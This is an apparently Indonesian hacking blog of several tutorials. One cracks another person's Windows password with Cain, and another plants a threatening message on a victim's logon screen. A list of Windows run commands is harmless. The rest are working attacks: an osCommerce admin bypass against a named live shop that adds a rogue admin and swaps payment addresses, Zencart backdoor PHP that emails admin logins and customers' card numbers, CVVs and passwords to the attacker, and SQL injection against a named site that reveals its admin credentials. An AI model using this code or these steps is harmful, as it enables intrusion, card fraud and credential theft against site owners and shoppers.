Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

Tuesday, December 6, 2011

[tutor]mengetahui password komputer dengan cain

kembali dengan cain...maap nie..lagi2 craking g sniper2an ..cz ga ada bahan wat praktek *_*!
ini untuk mengingatkan plend2 sekalian cara cracking password komputer pake cain
ini khusus windows

intro:
suatu hari surjono bermain ke rumah tomo..sesampainya di rumah surjono melihat komputer tomo
"tomo..bolehkah diri ku menggunakan komputer diri mu" tanya surjono "oh tentu saja diri mu boleh menggunakan komputer diri ku..silahkan di pakai,anggap saja seperti komputer bukan punya mu" kata tomo dengan ramah
"owh..makasih ..password ya apa tom??" kata surjono yang memang komputer tomo di pasang password dan tentu saja harus memasukan passsword ketika login..
tapi tomo tidak mengatakan password nya melainkan datang kedepan komputer dan langsung mengetik password dengan ligat cepat dan tepat..
dan akhirnya komputernya bisa di pakai oleh surjono.lalu tomo pun pergi " surjono aku pergi dulu ya,,mau mendodos sawit(memanen buah sawit)" kata tomo
dan setelah beberapa lama surjono pun penasaran dengan password yang di gunakan oleh tomo.dan surjono melihat CAIN ada di komputernya jono
-------------------------
oke intro udah..berarti permasalahnya si surjono ingin mengetahui password tomo menggunakan program cain

langsung

kelebihan cain dalam hal ini
1. cain mudah dan simple
kekurangan
1.kita harus menginstal cain jika cain tidak ada di komputer korban
2.lumayan lambat jika pake brute force
3.keberhasilan tergantung pada wordlist jika menggunakan dictionary attack

langsung
1.buka cain
2.pilih CRACKER

3.pilih LM & NTLM Hashes ( di pinggir program cain)

4.klik kanan pada menu LM & NTLM Hashes

5.pilih ADD TO LIST..nah keluar pilihan ada..centang yang IMPORT hashes from local system Artinya kita mengadd username dan hash yang ada di komputer( kalo ga salah)

6.klik NEXT

7.nah keluar tuh semua password yang masih dalam bentuk hash(bener ga ni??)

8.klik kanan pada username yang mau kita crack password ya

9.keluar pilihan..pilih dictionary attack kemudian pilih NTLM hashes..mengapa?karna type ya NTLM,coba di cek di lajur TYPE

10.nah keluar tuh..kita lakukan setingan..selain As lS(password) di ilangin centangnya..jadi cuma AS lS(password) yang di centang

11.pilih ADD untuk menambah daftar text...pokoknya masukin aja dah semua kumpulan password kita..semakin banyak..semakin besar keberuntungan kita..kalo ga punya gunakan bawaan cain..letaknya di c:\program files\cain\wordlists\wordlists.txt

12.klik STARt untuk memulai penyerangan

13.kalo password komputer terdapat di wordlist kemungkinan kita akan berhasil mendapatkan password nya jika tidak berhasil berarti kita harus memperbanyak wordlist

selain cara dictionary attack masih banyak cara lain..ex brute force..silahkan di explore n di inget2 lagi di memory.

Menampilkan Pesan Sebelum Masuk Windows


Tutorial ini akan membahas cara agar pesan anda ditampilkan setiap sebelum masuk windows. pesan tersebut bisa berupa teror, ancaman dll. Korban akan panik ketika dilayar komputernya terdapat sebuah pesan yang tidak pernah ia buat. Berikut Caranya:

Cara 1

1. buka control panel.

2. klik switch to clasic view.

3. kalau sudah klik administrative tools, lalu klik Local Security Policy.

4. lalu klik Local Policies, lalu klik Security Options.

5. klik Path Interactive logon:message title for users attempting to log on atau message title for users attempting to log on .

6. lalu isikan pesan yang ingin ditampilkan.

7. klik ok, dan program tersebut sudah bisa di akses.

Cara 2

1. Buka Regedit (Klik Start, Run ,Ketikan Regedit, lalu klik ok.)

2. Masuk ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon .

3. Di sebelah kanan terdapat String LegalNoticeText, klik 2x dan isi dengan pesan. Untuk judul pesan isi di LegalNoticeCaption.

4. Restart komputer untuk melihat hasilnya.

Cara 3

1. Buka notepad.exe dengan mengetikan dikotak run "notepad.exe".

2. Tuliskan Skript Berikut:
---------------Skript---------------

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /t Reg_SZ /d "pesan yang ingin ditampilkan" /f

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeCaption /t Reg_SZ /d "judul pesan" /f

---------------Skript--------------------

3. Save dalam bentuk file Bat (Save as, lalu klik Save type as,lalu pilih all files. Save dengan nama *.bat, misal Hx.bat)

4. Klik 2x File tersebut.

5. Restart Komputer untuk melihat hasilnya.

RUN command


Accessibility Controls = access.cpl

Accessibility Wizard = accwiz

Add Hardware Wizard = hdwwiz.cpl

Add/Remove Programs = appwiz.cpl

Administrative Tools = control admintools

Adobe Acrobat ( if installed ) = acrobat

Adobe Distiller ( if installed ) = acrodist

Adobe ImageReady ( if installed ) = imageready

Adobe Photoshop ( if installed ) = photoshop

Automatic Updates = wuaucpl.cpl

Basic Media Player = mplay32

Bluetooth Transfer Wizard = fsquirt

Calculator calc Ccleaner(if installed) = ccleaner

C: Drive = c:

Certificate Manager = cdrtmgr.msc

Character Map = charmap

Check Disk Utility = chkdsk

Clipboard Viewer = clipbrd

Command Prompt = cmd

Command Prompt = command

Component Services = dcomcnfg

Computer Management = compmgmt.msc

Compare Files = comp

Control Panel = control

Create a shared folder Wizard = shrpubw

Date and Time Properties = timedate.cpl

DDE Shares = ddeshare

Device Manager = devmgmt.msc

Direct X Control Panel ( if installed ) = directx.cpl

Direct X Troubleshooter = dxdiag

Disk Cleanup Utility = cleanmgr

Disk Defragment = dfrg.msc

Disk Partition Manager = diskmgmt.msc

Display Properties = control desktop

Display Properties = desk.cpl

Display Properties(w/Appearance Tab Preselected ) = control color

Dr. Watson System Troubleshooting Utility = drwtsn32

Driver Verifier Utility verifier Ethereal(if installed) = ethereal

Event Viewer = eventvwr.msc

Files and Settings Transfer Tool = migwiz

File Signature Verification Tool = sigverif

Findfast = findfast.cpl

Firefox = firefox

Folders Properties = control folders

Fonts = fonts

Fonts Folder = fonts

Free Cell Card Game = freecell

Game Controllers = joy.cpl

Group Policy Editor ( xp pro ) = gpedit.msc

Hearts Card Game = mshearts

Help and Support = helpctr

Hyperterminal = hypertrm

Hotline Client = hotlineclient

Iexpress Wizard = iexpress

Indexing Service = ciadv.msc

Internet Connection Wizard = icwonn1

Internet Properties = inetcpl.cpl

Internet Setup Wizard = inetwiz

IP Configuration = ipconfig /all

IP Configuration (Display DNS Cache Contents) = ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents) = ipconfig /flushdns

IP Configuration (Release All Connections) = ipconfig /release

IP Configuration (Renew All Connections) = ipconfig /renew

IP Config (Refreshes DHCP & Re-Registers DNS) = ipconfig /registerdns

IP Configuration (Display DHCP Class ID) = ipconfig /showclassid

IP Configuration (Modifies DHCP Class ID) = ipconfig /setclassid

Java Control Panel ( if installed ) = picpl32.cpl

Java Control Panel ( if installed ) = javaws

Keyboard Properties = control keyboard

Local Security Settings = secpol.msc

Local Users and Groups = lusrmgr.msc

Logs You Out of Windows = logoff

Malicious Software Removal Tool = mrt

Microsoft Access ( if installed ) = access.cpl

Microsoft Chat = winchat

Microsoft Excel ( if installed ) = excel

Microsoft Diskpart = diskpart

Microsoft Frontpage ( if installed ) = frontpg

Microsoft Movie Maker = moviemk

Microsoft Management Console = mmc



Microsoft Narrator = narrator

Microsoft Paint = mspaint

Microsoft Powerpoint = powerpnt

Microsoft Word ( if installed ) = winword

Microsoft Syncronization Tool = mobsync

Minesweeper Game = winmine

Mouse Properties = control mouse

Mouse Properties = main.cpl

MS-Dos Editor = edit

MS-Dos FTP = ftp

Nero ( if installed ) = nero

Netmeeting = conf

Network Connections = control netconnections

Network Connections = ncpa.cpl

Network Setup Wizard = netsetup.cpl

Notepad = notepad

Nview Desktop Manager ( if installed ) = nvtuicpl.cpl

Object Packager = packager

ODBC Data Source Administrator = odbccp32

ODBC Data Source Administrator = odbccp32.cpl

On Screen Keyboard = osk

Opens AC3 Filter ( if installed )= ac3filter.cpl

Outlook Express = msimn

Paint = pbrush

Password Properties = password.cpl

Performance Monitor = perfmon.msc

Performance Monitor = perfmon

Phone and Modem Options = telephon.cpl

Phone Dialer = dialer

Pinball Game = pinball

Power Configuration = powercfg.cpl

Printers and Faxes = control printers

Printers Folder= printers

Private Characters Editor = eudcedit

Quicktime ( if installed ) = quicktime.cpl

Quicktime Player ( if installed ) = quicktimeplayer

Real Player ( if installed ) = realplay

Regional Settings = intl.cpl

Registry Editor = regedit

Registry Editor = regedit32

Remote Access Phonebook = rasphone

Remote Desktop = mstsc

Removable Storage = ntmsmgr.msc

Removable Storage Operator Requests = ntmsoprq.msc

Resultant Set of Policy ( xp pro ) = rsop.msc

Scanners and Cameras = sticpl.cpl

Scheduled Tasks control= schedtasks

Security Center = wscui.cpl

Services = services.msc

Shared Folders = fsmgmt.msc

Sharing Session = rtcshare

Shuts Down Windows = shutdown

Sounds Recorder = sndrec32

Sounds and Audio = mmsys.cpl

Spider Solitare Card Game = spider

SQL Client Configuration = clicongf

System Configuration Editor = sysedit

System Configuration Utility = msconfig

System File Checker Utility ( Scan Immediately ) = sfc /scannow

System File Checker Utility ( Scan Once At Next Boot ) = sfc /scanonce

System File Checker Utility ( Scan On Every Boot ) = sfc /scanboot

System File Checker Utility ( Return to Default Settings) = sfc /revert

System File Checker Utility ( Purge File Cache ) = sfc /purgecache

System File Checker Utility ( Set Cache Size to Size x ) = sfc /cachesize=x

System Information msinfo32 System Properties = sysdm.cpl

Task Manager = taskmgr

TCP Tester = tcptest

Telnet Client = telnet

Tweak UI ( if installed ) = tweakui

User Account Management = nusrmgr.cpl

Utility Manager utilman

Volume Serial Number for = C: label

Volume Control = sndvol32

Windows Address Book = wab

Windows Address Book Import Utility = wabmig

Windows Backup Utility ( if installed ) = ntbackup

Windows Explorer = explorer

Windows Firewall = firewall.cpl

Windows Installer Details = msiexec

Windows Magnifier = magnify

Windows Management Infrastructure = wmimgmt.msc

Windows Media Player = wmplayer

Windows Messenger = msnsgs

Windows Picture Import Wizard (Need camera connected) = wiaacmgr

Windows System Security Tool = syskey

Windows Script host settings = wscript

Widnows Updte Launches = wupdmgr

Windows Version ( shows your windows version ) = winver

Windows XP Tour Wizard = tourstart

Wordpad = write

Zoom Utility = igfxzoom

bypass and RCE osCommerce

Assalammualaikum wr.wb

kali ini saya menulis tutorial tentang bypas oscom biasa nya fck editor buat cms kayak ini, tapi ini beda Grin
mungkin ada yg tau, tapi ini buat yg blom tau <-- seperti saya hahaha

langsung ke TKP saja
Cekibrott..

ex : http://www.fabulousmom.com/

cari tempat login adminnya

http://www.fabulousmom.com/catalog/admin/

lalu lakukan bypass
http://www.fabulousmom.com/catalog/admin/orders.php/ogin.php

cari letak page adminstratornya, biasanya di
administrators.php
admin_file.php
admin.php

so, jadinya
http://www.fabulousmom.com&/catalog/admin/administrators.php/login.php

lakukan insert/add new admin

http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=new

klik kanan > view sourcec

* PERHATIKAN *
lalu rubah pada kode berikut :
<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php?action=insert" method="post">

jadi

<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post">

==================

<input type="image" src="includes/languages/english/images/buttons/button_save.gif" border="0" alt="Save" title=" Save ">

jadi

<input type="submit" border="0" alt="Save" title=" Save " value="add" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post" enctype="multipart//form-data">
====================================

lalu save dengan nama rce_oscommerce.html
dan jalankan file tersebut lalu tombol add

ga terjadi apa² kan Pfft

salah sekarang tinggal login ajah dgn user dan password yg km buat di rce_oscommerce.html pada web target

trick di atas bisa juga langsung ganti alamat pp nya ma alamat pp anda Pfft

tingal ganti lokasi bypass nya /admin/module.php/login.php?set=payment

sekian dulu dari wassalammualikum wr.wb

asal mu asal dari Forum Tetangga Grin and mbah google

Backdoring zencart

/* edit login admin /*
siapa tau admin ganti dir page login admin , kita bisa coba backdoring lagi
Code
$server = $_SERVER['SERVER_NAME'];
$referer = $_SERVER['HTTP_REFERER']; # URL page admin
$to = "yourmail@yourdomain";
$admin_name = zen_db_prepare_input($_POST['admin_name']);
$admin_pass = zen_db_prepare_input($_POST['admin_pass']);
$subject = "admin from $server";
$message = "page login = $referer \n admin = $admin_name \n pass = $admin_pass \n";
$from = "mailsender@yourdomain";
$headers = "From: $from";
mail($to,$subject,$message,$headers);
file yg di edit :
Code
http://host/[path]/[diradmin]/login.php
/* edit payment /*
pasti dah pada tau :P

Code
$firstname = $order->billing['firstname'];
$lastname = $order->billing['lastname'];
$street = $order->billing['street_address'];
$city = $order->billing['city'];
$state = $order->billing['state'];
$zip = $order->billing['postcode'];
$country = $order->billing['country']['title'];
$dayphone = $order->customer['telephone'];
$ccowner = $_POST['cc_owner'];
$ccnumber = $_POST['cc_number'];
$ccexp = $_POST['cc_expires'];
$cardtype = $_POST['cc_type'];
$cvv = $_POST['cc_cvv'];
$cemail = $order->customer['email_address'];
$server = $_SERVER['SERVER_NAME'];
$message = "\n Name: $firstname $lastname \n Address: $street \n City: $city \n State: $state \n Zip: $zip \n Country: $country \n Phone: $dayphone \n email: $cemail \n cctype: $cardtype \n ccowner: $ccowner \n cc: $ccnumber \n exp: $ccexp \n cvv: $cvv \n";

file yg di edit :
Code
http://host/[path]/includes/modules/payment/[typepayment].php
/* edit create acc /*
buat soceng customer, sapa tau ada pp nyangkut hehe :D 
Code
$nick = $_POST['nick'];
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$street = $_POST['street_address'];
$company = $_POST['company'];
$suburb = $_POST['suburb'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['postcode'];
$country = $country;
$dayphone = $_POST['telephone'];
$cemail = $_POST['email_address'];
$pwd = $_POST['password'];
$dob = $_POST['dob'];
$server = $_SERVER['SERVER_NAME'];
$message = "\n nick:$nick \n Name:$firstname $lastname \n Address:$street \n company:$company \n suburb:$suburb \n City:$city \n State:$state \n Zip:$zip \n Country:$country \n Phone:$dayphone \n email:$cemail \n password:$pwd \n DOB:$dob \n";
mail("yourmail@yourdomain","Acc From $server", "$message");

 file yg di edit :
Code
http://host/[path]/includes/modules/create_account.php

SQL Injection pada X-Ice System

kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah… Description: :)
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
Description: :)

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat …
ex : inurl:/devami.asp?id= geri
Korban yang saya dapatkan adalah :
http://www.radyopinarim.com/haber1/devami.asp?id=1
Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini
Microsoft OLE DB Provider for ODBC Drivers hata ’80040e14′
[Microsoft][ODBC Microsoft Access Sürücüsü] ‘id=’ sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)
/haber1/devami.asp, satýr 8
Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,
kullaniciadi,2,3,4,5,6,7+from+admin
Yang saya dapatkan usernamenya adalah Kadrius
dan untuk mencari passwordnya
:
-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
passwordnya adalah 19901990
Untuk login sebagai admin anda tinggal balik kehalaman
/admin/kontrol.asp
Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.
 
Cyber Attack © 2011 Templates | g0bl33h